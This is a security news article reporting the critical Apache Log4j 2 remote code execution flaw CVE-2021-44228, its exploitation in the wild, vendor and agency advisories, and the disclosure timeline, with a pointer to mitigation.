icetray - Fotolia

Critical Apache Log4j 2 bug under attack; mitigate now

The Log4j 2 flaw has a base CVSS score of 10 and enables remote code execution against applications, cloud services and PC games with vulnerable configurations.

A recently discovered vulnerability in Log4j 2 is reportedly being exploited in the wild, putting widely used applications and cloud services at risk.

Log4j 2 is a popular Java logging framework developed by the Apache software foundation. The vulnerability, CVE-2021-44228, allows for remote code execution against users with certain standard configurations in prior versions of Log4j 2. As of Log4j 2.0.15 (released on Dec. 6), the vulnerable configurations have been disabled by default.

CVE-2021-44228 is considered a critical flaw, and it has a base CVSS score of 10 -- the highest possible severity rating.

Apache described the flaw, credited to Chen Zhaojun of Alibaba Cloud Security Team, on its Log4j2 vulnerabilities page as follows:

"Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP [Lightweight Directory Access Protocol] and other JNDI [Java Naming and Directory Interface] related endpoints," the description reads. "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default."

Users with previous versions can also mitigate the flaw by changing their configuration.

The vulnerability first became publicly known when a security researcher shared a proof of concept exploit of the then-unknown bug on Twitter Thursday morning. Since then, the bug was assigned a CVE and has already been used in attacks, according to reports from New Zealand's Computer Emergency Response Team (CERT), Cloudflare and others.

Additionally, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory Friday encouraging users and administrators to apply the appropriate mitigations.

Several security vendors and threat researchers have noted that Log4j 2 is used in many major cloud services, applications and PC games, including Apple iCloud, Minecraft and Cloudflare. Minecraft published an advisory Friday that said the company had addressed the Log4j 2 vulnerability but urged players and Minecraft server hosts to take additional steps to protect themselves.

Cloudflare sent the following statement to SearchSecurity: 

"We have no evidence of exploitation of us. We responded quickly to evaluate all potential areas of risk and updated our software to prevent attacks, and have not been able to replicate any external claims that we might be at risk. You can read more on our blog, and more details on the vulnerability can be found on the official Log4j security page."

Apache has not responded to SearchSecurity's questions at press time.

UPDATE 12/10: Apache Software Foundation (ASF) spokesperson said that according to the Apache Logging Services Project Management Committee, the group was first contacted about CVE-2021-44228 late last month. The ASF Security Team received the vulnerability report on Nov. 24, responded to the researcher on Nov. 26, and released a patch on Dec.; the spokesperson said the disclosure timeline dates may be approximate because of time zone differences.

Alexander Culafi is a writer, journalist and podcaster based in Boston.

Dig Deeper on Application and platform security

Enterprise Desktop
Cloud Computing